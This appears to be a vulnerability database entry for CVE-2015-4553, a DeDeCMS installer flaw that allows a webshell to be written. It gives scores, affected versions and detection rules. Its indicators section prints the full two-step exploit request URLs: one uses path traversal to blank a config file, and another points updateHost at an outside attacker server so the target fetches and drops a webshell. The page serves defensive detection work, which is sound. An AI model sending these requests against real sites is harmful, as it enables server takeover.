cbcvebase.
CVE-2015-4553
published 2020-01-06

CVE-2015-4553: A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.

PriorityP274high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
56.74%
98.9th percentile
A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.

Affected

2 ranges
VendorProductVersion rangeFixed in
dedecmsdedecms<= 5.6
dedecmsdedecms

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php
urlhttp://192.168.204.135/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://119.253.3.18:8000/
path/install/index.php.bak
path../data/admin/config_update.php
filenamehello.php
urlhttp://192.168.204.135/install/hello.php
  • Detect HTTP requests to /install/index.php.bak with query parameter step=11, which triggers the vulnerable code path used to overwrite config_update.php and write arbitrary webshells.
  • Alert on HTTP requests to /install/index.php.bak containing the parameter install_demo_name with path traversal sequences (e.g., '../') targeting config_update.php — Step 1 of the exploit clears the file to enable variable overwrite.
  • Alert on HTTP requests to /install/index.php.bak containing the parameter updateHost pointing to an attacker-controlled external host — Step 2 causes the server to fetch and write a webshell from that host.
  • Monitor for creation of new PHP files (e.g., hello.php) inside the /install/ directory, which is the webshell drop location used in this exploit.
  • Monitor for the file ../data/admin/config_update.php being truncated to 0 bytes, which is the prerequisite condition for Stage 2 of the exploit.
  • Detect outbound HTTP GET requests from the web server process matching the pattern /dedecms/demodata.<lang>.txt, which indicates the server is fetching attacker-controlled webshell content.
  • ·The exploit uses variable coverage (PHP variable overwrite) via unvalidated GET parameters in index.php.bak; the vulnerable file is a backup (.bak) of the installer that should not be publicly accessible post-installation.
  • ·Step 1 requires the install directory to still be present and accessible; the attack is only possible if the installer has not been removed after deployment.
  • ·The $updateHost variable in config_update.php is the critical control point; once config_update.php is zeroed out, the attacker can supply an arbitrary updateHost via GET parameter to redirect file fetching to an attacker-controlled server.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.